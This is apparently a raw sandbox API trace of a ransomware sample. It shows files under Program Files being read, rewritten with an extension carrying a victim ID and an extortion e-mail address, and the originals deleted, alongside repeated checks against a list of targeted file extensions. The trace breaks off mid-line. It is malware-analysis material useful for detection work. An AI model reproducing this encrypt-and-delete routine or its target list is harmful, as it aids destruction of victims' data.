[0314.727] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\javaws.policy")) returned 0x20 [0314.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\javaws.policy.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.728] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\javaws.policy"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0314.728] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.728] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.728] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\javaws.policy.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0314.729] GetLastError () returned 0x0 [0314.729] ReadFile (in: hFile=0x470, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x62, lpOverlapped=0x0) returned 1 [0315.087] WriteFile (in: hFile=0x3e4, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x70, lpOverlapped=0x0) returned 1 [0315.088] ReadFile (in: hFile=0x470, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0315.089] WriteFile (in: hFile=0x3e4, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xee, lpOverlapped=0x0) returned 1 [0315.089] SetEndOfFile (hFile=0x3e4) returned 1 [0315.089] CloseHandle (hObject=0x3e4) returned 1 [0315.089] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0315.089] SetEndOfFile (hFile=0x470) returned 1 [0315.095] CloseHandle (hObject=0x470) returned 1 [0315.095] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0315.327] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\javaws.policy")) returned 1 [0315.496] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy") returned 61 [0315.496] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy") returned 61 [0315.496] lstrlenW (lpString=".doc") returned 4 [0315.496] lstrcmpiW (lpString1=".doc", lpString2="licy") returned -1 [0315.496] lstrlenW (lpString=".docx") returned 5 [0315.497] lstrcmpiW (lpString1=".docx", lpString2="olicy") returned -1 [0315.497] lstrlenW (lpString=".pdf") returned 4 [0315.497] lstrcmpiW (lpString1=".pdf", lpString2="licy") returned -1 [0315.497] lstrlenW (lpString=".xls") returned 4 [0315.497] lstrcmpiW (lpString1=".xls", lpString2="licy") returned -1 [0315.498] lstrlenW (lpString=".xlsx") returned 5 [0315.498] lstrcmpiW (lpString1=".xlsx", lpString2="olicy") returned -1 [0315.498] lstrlenW (lpString=".ppt") returned 4 [0315.498] lstrcmpiW (lpString1=".ppt", lpString2="licy") returned -1 [0315.498] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy") returned 61 [0315.498] lstrlenW (lpString=".zip") returned 4 [0315.498] lstrcmpiW (lpString1=".zip", lpString2="licy") returned -1 [0315.498] lstrlenW (lpString=".rar") returned 4 [0315.498] lstrcmpiW (lpString1=".rar", lpString2="licy") returned -1 [0315.498] lstrlenW (lpString=".bz2") returned 4 [0315.498] lstrcmpiW (lpString1=".bz2", lpString2="licy") returned -1 [0315.498] lstrlenW (lpString=".7z") returned 3 [0315.498] lstrcmpiW (lpString1=".7z", lpString2="icy") returned -1 [0315.498] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy") returned 61 [0315.498] lstrlenW (lpString=".dbf") returned 4 [0315.498] lstrcmpiW (lpString1=".dbf", lpString2="licy") returned -1 [0315.498] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy") returned 61 [0315.498] lstrlenW (lpString=".1cd") returned 4 [0315.498] lstrcmpiW (lpString1=".1cd", lpString2="licy") returned -1 [0315.498] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy") returned 61 [0315.498] lstrlenW (lpString=".jpg") returned 4 [0315.498] lstrcmpiW (lpString1=".jpg", lpString2="licy") returned -1 [0315.498] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy") returned 61 [0315.498] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy") returned 61 [0315.499] lstrlenW (lpString=".doc") returned 4 [0315.499] lstrcmpiW (lpString1=".doc", lpString2="licy") returned -1 [0315.499] lstrlenW (lpString=".docx") returned 5 [0315.499] lstrcmpiW (lpString1=".docx", lpString2="olicy") returned -1 [0315.499] lstrlenW (lpString=".pdf") returned 4 [0315.499] lstrcmpiW (lpString1=".pdf", lpString2="licy") returned -1 [0315.499] lstrlenW (lpString=".xls") returned 4 [0315.499] lstrcmpiW (lpString1=".xls", lpString2="licy") returned -1 [0315.499] lstrlenW (lpString=".xlsx") returned 5 [0315.499] lstrcmpiW (lpString1=".xlsx", lpString2="olicy") returned -1 [0315.499] lstrlenW (lpString=".ppt") returned 4 [0315.499] lstrcmpiW (lpString1=".ppt", lpString2="licy") returned -1 [0315.499] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy") returned 61 [0315.499] lstrlenW (lpString=".zip") returned 4 [0315.499] lstrcmpiW (lpString1=".zip", lpString2="licy") returned -1 [0315.499] lstrlenW (lpString=".rar") returned 4 [0315.499] lstrcmpiW (lpString1=".rar", lpString2="licy") returned -1 [0315.499] lstrlenW (lpString=".bz2") returned 4 [0315.499] lstrcmpiW (lpString1=".bz2", lpString2="licy") returned -1 [0315.499] lstrlenW (lpString=".7z") returned 3 [0315.499] lstrcmpiW (lpString1=".7z", lpString2="icy") returned -1 [0315.499] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy") returned 61 [0315.499] lstrlenW (lpString=".dbf") returned 4 [0315.500] lstrcmpiW (lpString1=".dbf", lpString2="licy") returned -1 [0315.500] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy") returned 61 [0315.500] lstrlenW (lpString=".1cd") returned 4 [0315.500] lstrcmpiW (lpString1=".1cd", lpString2="licy") returned -1 [0315.500] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy") returned 61 [0315.500] lstrlenW (lpString=".jpg") returned 4 [0315.500] lstrcmpiW (lpString1=".jpg", lpString2="licy") returned -1 [0315.500] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0315.500] lstrlenW (lpString="api-ms-win-crt-stdio-l1-1-0.dll") returned 31 [0315.500] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0315.531] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=24768) returned 1 [0315.531] CloseHandle (hObject=0x530) returned 1 [0315.531] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll")) returned 0x220 [0315.533] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0315.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0316.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll") returned 77 [0316.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll") returned 77 [0316.407] lstrlenW (lpString=".doc") returned 4 [0316.407] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0316.407] lstrlenW (lpString=".docx") returned 5 [0316.407] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0316.407] lstrlenW (lpString=".pdf") returned 4 [0316.407] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0316.407] lstrlenW (lpString=".xls") returned 4 [0316.407] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0316.407] lstrlenW (lpString=".xlsx") returned 5 [0316.408] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0316.408] lstrlenW (lpString=".ppt") returned 4 [0316.408] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0316.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll") returned 77 [0316.408] lstrlenW (lpString=".zip") returned 4 [0316.408] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0316.408] lstrlenW (lpString=".rar") returned 4 [0316.408] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0316.408] lstrlenW (lpString=".bz2") returned 4 [0316.408] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0316.408] lstrlenW (lpString=".7z") returned 3 [0316.408] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0316.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll") returned 77 [0316.408] lstrlenW (lpString=".dbf") returned 4 [0316.408] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0316.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll") returned 77 [0316.408] lstrlenW (lpString=".1cd") returned 4 [0316.408] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0316.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll") returned 77 [0316.408] lstrlenW (lpString=".jpg") returned 4 [0316.408] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0316.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll") returned 77 [0316.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll") returned 77 [0316.408] lstrlenW (lpString=".doc") returned 4 [0316.408] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0316.409] lstrlenW (lpString=".docx") returned 5 [0316.409] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0316.409] lstrlenW (lpString=".pdf") returned 4 [0316.409] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0316.409] lstrlenW (lpString=".xls") returned 4 [0316.409] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0316.409] lstrlenW (lpString=".xlsx") returned 5 [0316.409] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0316.409] lstrlenW (lpString=".ppt") returned 4 [0316.409] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0316.409] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll") returned 77 [0316.409] lstrlenW (lpString=".zip") returned 4 [0316.409] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0316.409] lstrlenW (lpString=".rar") returned 4 [0316.409] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0316.409] lstrlenW (lpString=".bz2") returned 4 [0316.409] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0316.409] lstrlenW (lpString=".7z") returned 3 [0316.409] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0316.409] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll") returned 77 [0316.409] lstrlenW (lpString=".dbf") returned 4 [0316.409] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0316.409] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll") returned 77 [0316.409] lstrlenW (lpString=".1cd") returned 4 [0316.409] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0316.409] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll") returned 77 [0316.409] lstrlenW (lpString=".jpg") returned 4 [0316.410] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0316.410] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0316.410] lstrlenW (lpString="api-ms-win-crt-utility-l1-1-0.dll") returned 33 [0316.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0316.706] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=19136) returned 1 [0316.706] CloseHandle (hObject=0x470) returned 1 [0316.707] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll")) returned 0x220 [0316.863] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0317.053] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0317.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll") returned 79 [0317.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll") returned 79 [0317.401] lstrlenW (lpString=".doc") returned 4 [0317.401] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0317.401] lstrlenW (lpString=".docx") returned 5 [0317.401] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0317.401] lstrlenW (lpString=".pdf") returned 4 [0317.401] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0317.402] lstrlenW (lpString=".xls") returned 4 [0317.402] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0317.402] lstrlenW (lpString=".xlsx") returned 5 [0317.402] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0317.402] lstrlenW (lpString=".ppt") returned 4 [0317.402] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0317.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll") returned 79 [0317.402] lstrlenW (lpString=".zip") returned 4 [0317.402] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0317.402] lstrlenW (lpString=".rar") returned 4 [0317.402] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0317.402] lstrlenW (lpString=".bz2") returned 4 [0317.402] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0317.402] lstrlenW (lpString=".7z") returned 3 [0317.402] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0317.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll") returned 79 [0317.402] lstrlenW (lpString=".dbf") returned 4 [0317.402] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0317.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll") returned 79 [0317.402] lstrlenW (lpString=".1cd") returned 4 [0317.402] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0317.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll") returned 79 [0317.402] lstrlenW (lpString=".jpg") returned 4 [0317.402] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0317.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll") returned 79 [0317.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll") returned 79 [0317.403] lstrlenW (lpString=".doc") returned 4 [0317.403] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0317.403] lstrlenW (lpString=".docx") returned 5 [0317.403] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0317.403] lstrlenW (lpString=".pdf") returned 4 [0317.403] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0317.403] lstrlenW (lpString=".xls") returned 4 [0317.403] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0317.403] lstrlenW (lpString=".xlsx") returned 5 [0317.403] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0317.403] lstrlenW (lpString=".ppt") returned 4 [0317.403] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0317.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll") returned 79 [0317.403] lstrlenW (lpString=".zip") returned 4 [0317.403] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0317.403] lstrlenW (lpString=".rar") returned 4 [0317.403] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0317.403] lstrlenW (lpString=".bz2") returned 4 [0317.403] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0317.403] lstrlenW (lpString=".7z") returned 3 [0317.403] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0317.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll") returned 79 [0317.403] lstrlenW (lpString=".dbf") returned 4 [0317.403] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0317.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll") returned 79 [0317.403] lstrlenW (lpString=".1cd") returned 4 [0317.403] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0317.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll") returned 79 [0317.403] lstrlenW (lpString=".jpg") returned 4 [0317.403] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0317.404] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0317.404] lstrlenW (lpString="AppvIsvStream32.dll") returned 19 [0317.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvstream32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0317.405] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=396960) returned 1 [0317.405] CloseHandle (hObject=0x3b0) returned 1 [0317.405] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvstream32.dll")) returned 0x420 [0317.405] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvstream32.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0317.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvstream32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0317.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll") returned 65 [0317.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll") returned 65 [0317.406] lstrlenW (lpString=".doc") returned 4 [0317.406] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0317.406] lstrlenW (lpString=".docx") returned 5 [0317.406] lstrcmpiW (lpString1=".docx", lpString2="2.dll") returned -1 [0317.406] lstrlenW (lpString=".pdf") returned 4 [0317.406] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0317.406] lstrlenW (lpString=".xls") returned 4 [0317.406] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0317.406] lstrlenW (lpString=".xlsx") returned 5 [0317.406] lstrcmpiW (lpString1=".xlsx", lpString2="2.dll") returned -1 [0317.406] lstrlenW (lpString=".ppt") returned 4 [0317.406] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0317.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll") returned 65 [0317.406] lstrlenW (lpString=".zip") returned 4 [0317.406] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0317.406] lstrlenW (lpString=".rar") returned 4 [0317.406] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0317.406] lstrlenW (lpString=".bz2") returned 4 [0317.406] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0317.406] lstrlenW (lpString=".7z") returned 3 [0317.406] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0317.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll") returned 65 [0317.406] lstrlenW (lpString=".dbf") returned 4 [0317.406] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0317.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll") returned 65 [0317.406] lstrlenW (lpString=".1cd") returned 4 [0317.406] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0317.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll") returned 65 [0317.406] lstrlenW (lpString=".jpg") returned 4 [0317.406] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0317.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll") returned 65 [0317.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll") returned 65 [0317.407] lstrlenW (lpString=".doc") returned 4 [0317.407] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0317.407] lstrlenW (lpString=".docx") returned 5 [0317.407] lstrcmpiW (lpString1=".docx", lpString2="2.dll") returned -1 [0317.407] lstrlenW (lpString=".pdf") returned 4 [0317.407] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0317.407] lstrlenW (lpString=".xls") returned 4 [0317.407] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0317.407] lstrlenW (lpString=".xlsx") returned 5 [0317.407] lstrcmpiW (lpString1=".xlsx", lpString2="2.dll") returned -1 [0317.407] lstrlenW (lpString=".ppt") returned 4 [0317.407] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0317.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll") returned 65 [0317.407] lstrlenW (lpString=".zip") returned 4 [0317.407] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0317.407] lstrlenW (lpString=".rar") returned 4 [0317.407] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0317.407] lstrlenW (lpString=".bz2") returned 4 [0317.407] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0317.407] lstrlenW (lpString=".7z") returned 3 [0317.407] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0317.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll") returned 65 [0317.408] lstrlenW (lpString=".dbf") returned 4 [0317.408] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0317.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll") returned 65 [0317.408] lstrlenW (lpString=".1cd") returned 4 [0317.408] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0317.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll") returned 65 [0317.408] lstrlenW (lpString=".jpg") returned 4 [0317.408] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0317.408] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0317.408] lstrlenW (lpString="AppvIsvStream64.dll") returned 19 [0317.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvstream64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0317.410] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=473760) returned 1 [0317.410] CloseHandle (hObject=0x3b0) returned 1 [0317.410] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvstream64.dll")) returned 0x420 [0317.410] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 